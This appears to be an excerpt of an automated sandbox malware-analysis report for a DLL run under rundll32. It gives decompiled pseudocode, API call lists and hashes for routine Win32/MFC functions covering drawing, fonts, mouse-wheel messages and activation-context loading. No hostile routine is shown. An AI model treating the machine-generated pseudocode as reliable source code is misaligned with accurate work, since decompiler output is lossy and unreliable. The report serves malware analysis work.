                                                                                                        0x10021a90
                                                                                                        0x10021a97
                                                                                                        0x10021aa4

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10021812
                                                                                                          • Part of subcall function 1002165F: CreateRectRgnIndirect.GDI32(?), ref: 10021666
                                                                                                        • CopyRect.USER32 ref: 1002184B
                                                                                                        • InflateRect.USER32(?,?,?), ref: 10021861
                                                                                                        • IntersectRect.USER32 ref: 1002186F
                                                                                                        • CreateRectRgnIndirect.GDI32(?), ref: 10021879
                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1002188C
                                                                                                          • Part of subcall function 10021693: CombineRgn.GDI32(?,?,00000002,?), ref: 100216B6
                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 100218F8
                                                                                                        • CopyRect.USER32 ref: 10021915
                                                                                                        • InflateRect.USER32(?,?,?), ref: 1002192B
                                                                                                        • IntersectRect.USER32 ref: 10021939
                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1002196F
                                                                                                          • Part of subcall function 10021768: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 100217AE
                                                                                                          • Part of subcall function 10021768: CreatePatternBrush.GDI32(00000000), ref: 100217BB
                                                                                                          • Part of subcall function 10021768: DeleteObject.GDI32(00000000), ref: 100217C7
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100219E4
                                                                                                          • Part of subcall function 10009357: SelectObject.GDI32(?,00000000), ref: 10009379
                                                                                                          • Part of subcall function 10009357: SelectObject.GDI32(?,?), ref: 1000938F
                                                                                                        • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 10021A37
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3Pattern
                                                                                                        • String ID:
                                                                                                        • API String ID: 3342639795-0
                                                                                                        • Opcode ID: 27878363cce4e4d802bc57ad59692b235be21c872cc19aa691137ed429ca5c10
                                                                                                        • Instruction ID: 8f3ab7ecab5f51aaf2319344c9cbb7601b2c59b21e49a1fee434560ae7685461
                                                                                                        • Opcode Fuzzy Hash: 27878363cce4e4d802bc57ad59692b235be21c872cc19aa691137ed429ca5c10
                                                                                                        • Instruction Fuzzy Hash: E29111B990010DAFDF01DFA4CA958EEBBB9FF18244B50411AF906B3291DB34AE05CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10032282, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 58windowregistryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10032282(void* __ecx, intOrPtr* _a4, int* _a8, int* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				struct HWND__* _v8;
				int _t14;
				int _t15;
				int _t16;
				int* _t22;
				int _t23;
				int* _t31;
				int _t32;

				_v8 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_a4 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
				_t14 = RegisterWindowMessageA("MSH_WHEELSUPPORT_MSG");
				_t31 = _a8;
				 *_t31 = _t14;
				_t15 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
				_t22 = _a12;
				 *_t22 = _t15;
				_t32 =  *_t31;
				_t16 = 0;
				if(_t32 == 0) {
					 *_a16 = 0;
				} else {
					 *_a16 = SendMessageA(_v8, _t32, 0, 0);
					_t16 = 0;
				}
				_t23 =  *_t22;
				if(_t23 == _t16) {
					 *_a20 = 3;
				} else {
					 *_a20 = SendMessageA(_v8, _t23, _t16, _t16);
				}
				return _v8;
			}











                                                                                                        0x100322a4
                                                                                                        0x100322b1
                                                                                                        0x100322b3
                                                                                                        0x100322b5
                                                                                                        0x100322bd
                                                                                                        0x100322bf
                                                                                                        0x100322c1
                                                                                                        0x100322ca
                                                                                                        0x100322cc
                                                                                                        0x100322ce
                                                                                                        0x100322d2
                                                                                                        0x100322e8
                                                                                                        0x100322d4
                                                                                                        0x100322df
                                                                                                        0x100322e1
                                                                                                        0x100322e1
                                                                                                        0x100322ea
                                                                                                        0x100322ee
                                                                                                        0x10032302
                                                                                                        0x100322f0
                                                                                                        0x100322fb
                                                                                                        0x100322fb
                                                                                                        0x1003230f

                                                                                                        APIs
                                                                                                        • FindWindowA.USER32 ref: 10032293
                                                                                                        • RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 100322A7
                                                                                                        • RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG), ref: 100322B3
                                                                                                        • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 100322BF
                                                                                                        • SendMessageA.USER32 ref: 100322DA
                                                                                                        • SendMessageA.USER32 ref: 100322F6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Window$Register$Send$Find
                                                                                                        • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                        • API String ID: 3569030445-3736581797
                                                                                                        • Opcode ID: 5c65d925ded3aea0597b9de184b93df891d44074dd8624c01524511124f35b40
                                                                                                        • Instruction ID: 7eb448f67160629c0821becfe2f35b715441f62429a965571e3e6846dc91c331
                                                                                                        • Opcode Fuzzy Hash: 5c65d925ded3aea0597b9de184b93df891d44074dd8624c01524511124f35b40
                                                                                                        • Instruction Fuzzy Hash: A711F7B5A10219FFDB05CF64CC889AE3BF9EB49394B114465E901EB350D771AE10DFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001F340, Relevance: 18.1, APIs: 12, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E1001F340(void* __ebx, void* __ecx, void* __edx, int _a4) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v100;
				void _v128;
				int _v132;
				struct HDC__* _v136;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t29;
				struct HDC__* _t40;
				int _t41;
				void* _t50;
				void* _t62;
				void* _t63;
				signed int _t65;

				_t62 = __edx;
				_t54 = __ecx;
				_t50 = __ebx;
				_t29 =  *0x10072650; // 0xb5e27fef
				_v8 = _t29 ^ _t65;
				_t64 = _a4;
				_t63 = __ecx;
				_t66 = __ecx;
				_v132 = _t64;
				if(__ecx != 0) {
					L2:
					if(_t64 == 0) {
						goto L1;
					}
					_t32 = E10038EAD(_t50, _t63 + 0x6c, _t65,  *((intOrPtr*)(_t63 + 0x74)), 0);
					if( *(_t63 + 0x80) == 0) {
						_t32 = E100044D0(_t63);
						if(_t32 != 0) {
							_push(_t50);
							GetObjectA( *(_t32 + 4), 0x3c,  &_v68);
							GetObjectA(GetStockObject(0xd), 0x3c,  &_v128);
							if(E1000D035( &(_v68.lfFaceName),  &_v100) != 0) {
								_t40 = GetDC(0);
								_t64 = GetDeviceCaps;
								_v136 = _t40;
								_t41 = GetDeviceCaps( *0x00000008, 0x5a);
								_v68.lfHeight = MulDiv(_v68, _t41, GetDeviceCaps(_v136, 0x5a));
								_v132 = GetDeviceCaps( *(_v132 + 8), 0x58);
								_v68.lfWidth = MulDiv(_v68.lfWidth, _v132, GetDeviceCaps(_v136, 0x58));
								ReleaseDC(0, _v136);
								_t32 = CreateFontIndirectA( &_v68);
								 *(_t63 + 0x84) = _t32;
								 *(_t63 + 0x80) = _t32;
							}
							_pop(_t50);
						}
					}
					return E10039F21(_t32, _t50, _v8 ^ _t65, _t62, _t63, _t64);
				}
				L1:
				E1000836F(_t50, _t54, _t63, _t64, _t66);
				goto L2;
			}



















                                                                                                        0x1001f340
                                                                                                        0x1001f340
                                                                                                        0x1001f340
                                                                                                        0x1001f349
                                                                                                        0x1001f350
                                                                                                        0x1001f354
                                                                                                        0x1001f358
                                                                                                        0x1001f35a
                                                                                                        0x1001f35c
                                                                                                        0x1001f35f
                                                                                                        0x1001f366
                                                                                                        0x1001f368
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001f372
                                                                                                        0x1001f37e
                                                                                                        0x1001f386
                                                                                                        0x1001f38d
                                                                                                        0x1001f393
                                                                                                        0x1001f3a3
                                                                                                        0x1001f3b4
                                                                                                        0x1001f3c7
                                                                                                        0x1001f3cb
                                                                                                        0x1001f3d6
                                                                                                        0x1001f3dc
                                                                                                        0x1001f3e2
                                                                                                        0x1001f3fd
                                                                                                        0x1001f412
                                                                                                        0x1001f426
                                                                                                        0x1001f42b
                                                                                                        0x1001f435
                                                                                                        0x1001f43b
                                                                                                        0x1001f441
                                                                                                        0x1001f441
                                                                                                        0x1001f447
                                                                                                        0x1001f447
                                                                                                        0x1001f38d
                                                                                                        0x1001f455
                                                                                                        0x1001f455
                                                                                                        0x1001f361
                                                                                                        0x1001f361
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetObjectA.GDI32(?,0000003C,?), ref: 1001F3A3
                                                                                                        • GetStockObject.GDI32(0000000D), ref: 1001F3AD
                                                                                                        • GetObjectA.GDI32(00000000,?,?), ref: 1001F3B4
                                                                                                        • GetDC.USER32(00000000), ref: 1001F3CB
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 1001F3E2
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 1001F3EE
                                                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 1001F3FB
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 1001F408
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 1001F415
                                                                                                        • MulDiv.KERNEL32(?,?,00000000), ref: 1001F41E
                                                                                                        • ReleaseDC.USER32 ref: 1001F42B
                                                                                                        • CreateFontIndirectA.GDI32(?), ref: 1001F435
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDevice$Object$CreateException@8FontH_prolog3IndirectReleaseStockThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 642654325-0
                                                                                                        • Opcode ID: 69697762f98c175853476738a19d6b9283dcd3d0d62039b7e5ce766fabcfb69e
                                                                                                        • Instruction ID: e4e84310eb1f7f673988f6b2a4b92a94e364b014863b64c70e208f28a7001c3c
                                                                                                        • Opcode Fuzzy Hash: 69697762f98c175853476738a19d6b9283dcd3d0d62039b7e5ce766fabcfb69e
                                                                                                        • Instruction Fuzzy Hash: 15315E75A00219AFEB11DBA4CC85BAEBBB8FF18751F00411AEA44E61A0DB30AA01DF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002644F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1002644F(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10098ed4; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E1000836F(0, _t12, _t15, _t16, _t20);
					}
					 *0x10098ec4 = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10098ec8 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10098ecc = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10098ec4; // 0x0
					 *0x10098ed0 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10098ec8; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10098ecc; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10098ec8; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10098ecc; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10098ed4 = 1;
				}
				return _t18;
			}














                                                                                                        0x1002644f
                                                                                                        0x1002644f
                                                                                                        0x10026455
                                                                                                        0x10026459
                                                                                                        0x1002645c
                                                                                                        0x1002645f
                                                                                                        0x10026466
                                                                                                        0x10026477
                                                                                                        0x10026479
                                                                                                        0x1002647b
                                                                                                        0x1002647d
                                                                                                        0x1002647d
                                                                                                        0x1002647d
                                                                                                        0x10026497
                                                                                                        0x100264a4
                                                                                                        0x100264b1
                                                                                                        0x100264b6
                                                                                                        0x100264b8
                                                                                                        0x100264be
                                                                                                        0x100264c3
                                                                                                        0x100264c4
                                                                                                        0x100264dc
                                                                                                        0x100264e2
                                                                                                        0x00000000
                                                                                                        0x100264e4
                                                                                                        0x100264e4
                                                                                                        0x100264ea
                                                                                                        0x00000000
                                                                                                        0x100264ec
                                                                                                        0x100264ec
                                                                                                        0x100264ee
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100264ee
                                                                                                        0x100264ea
                                                                                                        0x100264c6
                                                                                                        0x100264c6
                                                                                                        0x100264cc
                                                                                                        0x00000000
                                                                                                        0x100264ce
                                                                                                        0x100264ce
                                                                                                        0x100264d4
                                                                                                        0x00000000
                                                                                                        0x100264d6
                                                                                                        0x100264d6
                                                                                                        0x100264d8
                                                                                                        0x00000000
                                                                                                        0x100264da
                                                                                                        0x100264d8
                                                                                                        0x100264d4
                                                                                                        0x100264cc
                                                                                                        0x100264f0
                                                                                                        0x100264f0
                                                                                                        0x100264fc

                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,10027076,000000FF), ref: 10026471
                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 1002648F
                                                                                                        • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1002649C
                                                                                                        • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 100264A9
                                                                                                        • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 100264B6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                        • API String ID: 667068680-3617302793
                                                                                                        • Opcode ID: 4dae66e16ba0676ad529ecfcd43bcb397ead7d5ee40f0915e13f88ec5a049278
                                                                                                        • Instruction ID: e9cc3cf0067e69ee31c57108128d06749ce3ac726ccf510888d85e77703269a3
                                                                                                        • Opcode Fuzzy Hash: 4dae66e16ba0676ad529ecfcd43bcb397ead7d5ee40f0915e13f88ec5a049278
                                                                                                        • Instruction Fuzzy Hash: 1D11C471C11276EFE745EF65ACD444ABAE8F749A44741403FE2C8822A0D7B04B44CF11
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001F120, Relevance: 16.6, APIs: 11, Instructions: 82memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 88%
                                                                                                        			E1001F120(void* __ecx, intOrPtr _a4, int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t17;
				void* _t19;
				void* _t20;
				void* _t27;
				int _t37;
				void* _t45;

				_t37 = _a8;
				_t45 = __ecx;
				_t17 = E10001FC0(_t37 + 1, 1);
				_pop(_t40);
				_t44 = LocalAlloc(2, _t17);
				_t46 = _t44;
				if(_t44 != 0) {
					L2:
					_t19 = LocalLock(_t44);
					_t40 = _a4;
					_a8 = _t19;
					_t20 = E10021BE0(_a4, _t44, _t19, _t37);
					_t47 = _t20 - _t37;
					if(_t20 != _t37) {
						LocalUnlock(_t44);
						LocalFree(_t44);
						_push(0);
						_push(3);
						E10029BF0(_t37, _t44, _t45, _t47);
					}
					 *((char*)(_a8 + _t37)) = 0;
					if( *0x10099164 != 0 || E10012BAD(_t40, _t44) == 0x60000) {
						_a8 = SetWindowTextA( *(_t45 + 0x20), _a8);
						LocalUnlock(_t44);
						LocalFree(_t44);
						_t44 = 0;
						__eflags = _a8;
						if(__eflags == 0) {
							goto L1;
						}
						__eflags = GetWindowTextLengthA( *(_t45 + 0x20)) - _t37;
						if(__eflags < 0) {
							goto L1;
						}
						_push( *((intOrPtr*)(_t45 + 0x64)));
						_t27 = E10007788(_t37, 0, _t45, __eflags);
						 *((intOrPtr*)(_t45 + 0x64)) = 0;
						 *((intOrPtr*)(_t45 + 0x68)) = 0;
						return _t27;
					} else {
						LocalUnlock(_t44);
						LocalFree(E1001F02D(_t45));
						E1001F040(_t45, _t44);
						return InvalidateRect( *(_t45 + 0x20), 0, 1);
					}
				}
				L1:
				E1000833B(_t37, _t40, _t44, _t45, _t46);
				goto L2;
			}













                                                                                                        0x1001f124
                                                                                                        0x1001f12f
                                                                                                        0x1001f131
                                                                                                        0x1001f137
                                                                                                        0x1001f141
                                                                                                        0x1001f143
                                                                                                        0x1001f145
                                                                                                        0x1001f14c
                                                                                                        0x1001f14d
                                                                                                        0x1001f153
                                                                                                        0x1001f158
                                                                                                        0x1001f15b
                                                                                                        0x1001f160
                                                                                                        0x1001f162
                                                                                                        0x1001f165
                                                                                                        0x1001f16c
                                                                                                        0x1001f172
                                                                                                        0x1001f174
                                                                                                        0x1001f176
                                                                                                        0x1001f176
                                                                                                        0x1001f17e
                                                                                                        0x1001f189
                                                                                                        0x1001f1d0
                                                                                                        0x1001f1d3
                                                                                                        0x1001f1da
                                                                                                        0x1001f1e0
                                                                                                        0x1001f1e2
                                                                                                        0x1001f1e5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001f1f4
                                                                                                        0x1001f1f6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001f1fc
                                                                                                        0x1001f1ff
                                                                                                        0x1001f205
                                                                                                        0x1001f208
                                                                                                        0x00000000
                                                                                                        0x1001f197
                                                                                                        0x1001f198
                                                                                                        0x1001f1a6
                                                                                                        0x1001f1af
                                                                                                        0x00000000
                                                                                                        0x1001f1bb
                                                                                                        0x1001f189
                                                                                                        0x1001f147
                                                                                                        0x1001f147
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • LocalAlloc.KERNEL32(00000002,00000000), ref: 1001F13B
                                                                                                        • LocalLock.KERNEL32(00000000), ref: 1001F14D
                                                                                                        • LocalUnlock.KERNEL32(00000000,00000000,?), ref: 1001F165
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 1001F16C
                                                                                                        • LocalUnlock.KERNEL32(00000000,00000000,?), ref: 1001F198
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 1001F1A6
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 1001F1BB
                                                                                                          • Part of subcall function 1000833B: __CxxThrowException@8.LIBCMT ref: 1000834F
                                                                                                        • SetWindowTextA.USER32(?,?), ref: 1001F1C9
                                                                                                        • LocalUnlock.KERNEL32(00000000), ref: 1001F1D3
                                                                                                        • LocalFree.KERNEL32(00000000), ref: 1001F1DA
                                                                                                        • GetWindowTextLengthA.USER32(?), ref: 1001F1EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Local$FreeUnlock$TextWindow$AllocException@8InvalidateLengthLockRectThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1615311496-0
                                                                                                        • Opcode ID: abbe6a63ff4c480e8b6d0ff643644af9efc860aaee534bda4170270ffd9cdcd1
                                                                                                        • Instruction ID: 90872651096951830237a12cadd320912b739d3409e77534ecc1a241206bc270
                                                                                                        • Opcode Fuzzy Hash: abbe6a63ff4c480e8b6d0ff643644af9efc860aaee534bda4170270ffd9cdcd1
                                                                                                        • Instruction Fuzzy Hash: 6E21927A100210BBEB129F64CC89B6E77F9FF98B51F00441EF94AD9161CB34E680CB21
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10004820, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 223windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E10004820(intOrPtr __ecx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v56;
				struct tagRECT _v76;
				intOrPtr _v84;
				struct tagRECT _v104;
				struct tagRECT _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				char _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t99;
				signed int _t103;
				signed int _t104;
				signed int _t107;
				signed int _t111;
				signed int _t114;
				signed int _t122;
				intOrPtr _t137;
				signed int _t138;
				void* _t150;
				intOrPtr _t187;
				signed int _t194;
				intOrPtr _t199;
				signed int _t208;
				intOrPtr* _t209;
				void* _t214;
				void* _t218;
				intOrPtr* _t219;

				_v84 = __ecx;
				_t99 = E10004630(__ecx);
				_t214 = _t99;
				if(_t214 != 0) {
					GetClientRect( *(_t214 + 0x20),  &_v104);
					InflateRect( &_v104, 0xffffffff, 0xffffffff);
					_t103 = E10011632(_t214);
					__eflags = _t103 & 0x00100000;
					if((_t103 & 0x00100000) != 0) {
						_t7 =  &(_v104.bottom);
						 *_t7 = _v104.bottom + 1;
						__eflags =  *_t7;
					}
					_t104 = E10011632(_t214);
					__eflags = _t104 & 0x00200000;
					if((_t104 & 0x00200000) != 0) {
						_t11 =  &(_v104.right);
						 *_t11 = _v104.right + 1;
						__eflags =  *_t11;
					}
					_t150 = SendMessageA;
					SendMessageA( *(_t214 + 0x20), 0xb2, 0,  &_v76);
					_t107 = IsRectEmpty( &_v76);
					__eflags = _t107;
					_t218 = SetRect;
					if(_t107 != 0) {
						SetRect( &_v76, 4, 4, 4, 4);
					}
					SetRect( &_v120, _v76.left - _v104.left, _v76.top - _v104.top, _v76.left - _v104.left, _v76.top - _v104.top);
					_t111 = E10011632(_t214);
					__eflags = _t111 & 0x00100000;
					if((_t111 & 0x00100000) != 0) {
						_t24 =  &(_v120.bottom);
						 *_t24 = _v120.bottom + 1;
						__eflags =  *_t24;
					}
					_t166 = _t214;
					__eflags = E10011632(_t214) & 0x00200000;
					if(__eflags != 0) {
						_t28 =  &(_v120.right);
						 *_t28 = _v120.right + 1;
						__eflags =  *_t28;
					}
					_push(SendMessageA( *(_t214 + 0x20), 0x31, 0, 0));
					_t114 = E10009228(_t150, _t166, _t214, _t218, __eflags);
					__eflags = _t114;
					_t219 = _a4;
					_v104.bottom = 0;
					if(_t114 != 0) {
						_v104.right =  *((intOrPtr*)( *((intOrPtr*)( *_t219 + 0x28))))(_t114);
					}
					_t199 = _v120.bottom;
					_v128 = _v104.right;
					_v132 = _v104.top - _v120.top;
					_v140 = _t199;
					_v140 = _v124 + _t199;
					_v136 = _v104.left + _v120.left;
					_v128 = 0x7fffffff;
					E100085BB(_t219, 1);
					 *((intOrPtr*)( *((intOrPtr*)( *_t219 + 0x1c))))();
					E10008722(_t219, 0, 0, 0, 0);
					_t154 = _v120.bottom;
					_t122 = E1001F83B(_t214,  *((intOrPtr*)(_v120.bottom + 0x7c)), _t219,  &_v160,  *((intOrPtr*)(_v120.bottom + 0x7c)),  *((intOrPtr*)(_v120.bottom + 0x80)));
					__eflags = _t122;
					if(_t122 == 0) {
						GetTextMetricsA( *(_t219 + 8),  &(_v76.bottom));
						_t194 = _v56 + _v76.top + _v144;
						__eflags = _t194;
						_v136 = _t194;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *_t219 + 0x20))))(0xffffffff);
					E10008BD3(_t219,  &(_v104.bottom), _v144 - _v128, _v140 - _v124);
					 *((intOrPtr*)( *((intOrPtr*)( *_t219 + 0x48))))( &_v104, _v148 - _v156 + _v140 + _v132, _v144 - _v152 + _v136 + _v128);
					E1001F83B(_t214,  &_v168, _t219,  &_v168,  *((intOrPtr*)(_t154 + 0x7c)),  *((intOrPtr*)(_t154 + 0x80)));
					_v184 = _v184 - _v168;
					_v180 = _v180 - _v164;
					_t187 = _v176 + _v160;
					_t137 = _v172 + _v156;
					_t208 = _v136;
					__eflags = _t208;
					_v176 = _t187;
					_v172 = _t137;
					if(_t208 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t219 + 0x28))))(_t208);
						_t137 = _v148;
						_t187 = _v152;
					}
					_t209 = _a8;
					_t138 = _t137 - _v152;
					__eflags = _t138;
					 *_t209 = _t187 - _v156;
					 *(_t209 + 4) = _t138;
					E1002174D(_t219, _t209);
					return 1;
				} else {
					return _t99;
				}
			}














































                                                                                                        0x10004831
                                                                                                        0x10004835
                                                                                                        0x1000483a
                                                                                                        0x1000483e
                                                                                                        0x10004852
                                                                                                        0x10004861
                                                                                                        0x10004869
